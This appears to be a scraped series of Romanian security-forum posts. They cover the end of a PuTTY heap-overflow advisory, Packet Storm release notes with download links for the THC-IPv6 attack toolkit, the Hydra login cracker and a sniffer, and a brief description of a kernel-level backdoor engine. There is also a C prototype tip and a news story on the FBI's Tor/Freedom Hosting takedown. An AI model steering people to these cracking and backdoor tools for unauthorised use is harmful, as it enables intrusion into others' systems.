vulnerability could potentially lead to code execution due to the exception handling employed by the program. Solution: This vulnerability has been fixed in the development version of PuTTY [2]. All developers using PuTTY code are recommended to use revision 9896 or later. The potential code execution vulnerability has been addressed in WinSCP 5.1.6 [3]. Credits: This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu) References: [1] http://www.search-lab.hu/advisories/secadv-20130722 [2] http://svn.tartarus.org/sgt?view=revision&sortby=date&revision=9896 [3] http://winscp.net/tracker/show_bug.cgi?id=1017 Sursa: PuTTY 0.62 Heap Overflow ? Packet Storm

Da, interesant

THC-IPv6 Attack Tool 2.3 Authored by van Hauser, thc | Site thc.org THC-IPV6 is a toolkit that attacks the inherent protocol weaknesses of IPv6 and ICMP6 and it includes an easy to use packet factory library. Changes: 2 new tools added as well as 2 new scripts. Various updates to existing tools. Download: http://packetstormsecurity.com/files/download/122685/thc-ipv6-2.3.tar.gz Sursa: THC-IPv6 Attack Tool 2.3 ? Packet Storm

Hydra Network Logon Cracker 7.5 Authored by van Hauser, thc | Site thc.org THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus. Changes: Moved the license from GPLv3 to AGPLv3. Added module for Asterisk Call Manager. Added support for Android where some functions are not available. Various other updates. Download: http://packetstormsecurity.com/files/download/122684/hydra-7.5.tar.gz Sursa: Hydra Network Logon Cracker 7.5 ? Packet Storm

Netsniff-NG High Performance Sniffer 0.5.8 RC2 Authored by Tobias Klauser, Daniel Borkmann | Site code.google.com netsniff-ng is is a free, performant Linux network sniffer for packet inspection. The gain of performance is reached by 'zero-copy' mechanisms, so that the kernel does not need to copy packets from kernelspace to userspace. For this purpose netsniff-ng is libpcap independent, but nevertheless supports the pcap file format for capturing, replaying and performing offline-analysis of pcap dumps. netsniff-ng can be used for protocol analysis, reverse engineering and network debugging. Changes: Build system fixes and clean ups. Mausezahn man pages improvements. Compiler warnings fixed. Support for replaying/reading pcap capture files from/to tunnel devices. Download: http://packetstormsecurity.com/files/download/122652/netsniff-ng-0.5.8-rc2.tar.gz Sursa: Netsniff-NG High Performance Sniffer 0.5.8 RC2 ? Packet Storm

(Syscall IDP Engine). Captures all system services(KDR, hidden). Returns control on specified address(int 0x2e/sysenter -> PEB.Filter()). By calling the backdoor control is returned to the kernel(Filter() -> backdoor() -> nt service dispatcher). o X86, KM, MI, KDR. o May be choose SST[0], SST[0] for gui-thread, SST[1] for shadow. Vid Video2.avi — RGhost — ????????????? Org VX Forum SIDE.zip Sursa: SIDE.

Ideea e simpla. Sa presupunem ca scrii o functie: RST() pe care o apelezi in main(). int main(){ RST(); } void RST() { // Ceva } Acest cod iti va da eroare deoarece in main, NU cunoaste functia RST, deoarece nu a fost declarata inca (pe scurt, pentru ca e definita SUB functia main). Ceea ce poti face insa e ca deasupra functiei main, sa declari PROTOTIPUL functiei RST, urmat de ";". Adica: void RST();int main() { RST(); } void RST() { // Ceva } Acum compilatorul stie ca tu ai o functie RST, fara parametri, de tip "void". Asta e ideea.

Paper util: http://www.iacr.org/cryptodb/archive/2002/FSE/3091/3091.pdf

Mie imi merg cele de pe imgur. Nu va apar? Dati si voi Clear Cache ceva.

Da, adica voi puneti link-uri de cacat, catre pagini HTML care CONTIN o porcarie de imagine. Puneti link direct catre imagine daca vreti sa mearga. Multumim pentru intelegere.

S-a incercat asa ceva in trecut, s-au laudat multi ca vor a invete, ca vor sa participe si ne trezeam cu vreo 10 insi care erau pe chat (era un chat pe care se discuta, se explica) dintre care 6-7 nici nu erau la calculator.

Stiu: Firefox Zero-Day Exploit used by FBI to shutdown Child porn on Tor Network hosting; Tor Mail Compromised - The Hacker News

Jumatate dintre site-urile din reteaua TOR, compromise. Fondatorul Freedom Hosting, arestat de Redactia Hit | 5 august 2013 FBI-ul a demarat in acest week-end o actiune de proportii care vizeaza depistarea si capturarea furnizorilor de materiale online ilegale care au ca subiect pornografia infantila. Deja au avut loc arestari importante. Potrivit unei postari pe TwittLonger, mai bine de jumatate dintre site-urile care ruleaza prin reteaua Tor au fost compromise si acelasi lucru s-a intamplat cu adresele de email de pe TORmail, considerat cel mai bine securizat serviciu de posta electronica. In cadrul actiunii autoritatilor americane, Eric Eoin Marques, fondatorul Freedom Hosting, care deserveste inclusiv serverele TORmail, a fost arestat in Irlanda si acuzat de furnizare si promovare de materiale pornografice cu minori. FBI-ul il descrie pe Eric Eoin Marques drept "cel mai mare promotor de astfel de materiale din lume", iar autoritatile americane au cerut extradarea. Sambata dimineata, in acelasi timp cu raspandirea vestii arestarii lui Eric Eoin Marques, toate site-urile gazduite de FH au fost inchise, potrivit publicatiei DailyDot.com, iar majoritatea celor care au revenit online putin mai tarziu au fost compromise cu ajutorul unei vulnerabilitati care permite accesul la cookie-uri, autentificari si adrese IP. Interesant este faptul ca aceasta cadere a multor site-uri care functioneaza prin TOR si a serviciilor TORmail a avut loc chiar in timpul conferintei de hacking DEFCON, care s-a desfasurat intr 1 si 4 august. Trebuie precizat faptul ca TOR nu este o retea care trebuie confundata cu instrumentul exlcusiv al infractorilor online. TOR este folosita de toti cei care sperau ca reteaua le poate asigura confidentialitatea datelor personale si a comunicatiilor online si s-a bucurat de succes mai ales in contextul intruziunii din ce in ce mai directe a autoritatilor in viata privata a indivizilor. In ultimii cinci ani, autoritatile si diferite organizatii de hackeri au incercat sa sparga securitatea retelei, insa abia acum acest lucru a fost realizat. Freedom Hosting este serviciul de gazduire internet cel mai popular din reteaua TOR, dar si, probabil, cel mai controversat din cauza legaturilor cu site-uri ilegale precum Lolita City, the Love Zone sau PedoEmpire. In acest moment, multe site-uri gazduite de Freedom Hosting sunt la pamant sau sunt raportate ca infectate. Inchiderea celor mai importante site-uri de pornografie infantila este prima victorie concreta si de proportii a autoritatilor impotriva infractorilor online. Momentan, insa, nu se poate spune cine a stat la baza atacului asupra Freedom Hosting si nici care a fost metoda de atac. Din informatiile care circula pe internet, "raidul" FBI si al hackerilor care sprijina actiunea autoritatilor va continua cel putin inca doua saptamani. Vom reveni cu amanunte. Surse: The Daily Dot, Irish Independent Deoarece va pica coaiele daca cititi stirea in engleza, uitati o versiune in limba romana. Muie. Sursa: Jumatate dintre site-urile din reteaua TOR, compromise. Fondatorul Freedom Hosting, arestat | Hit.ro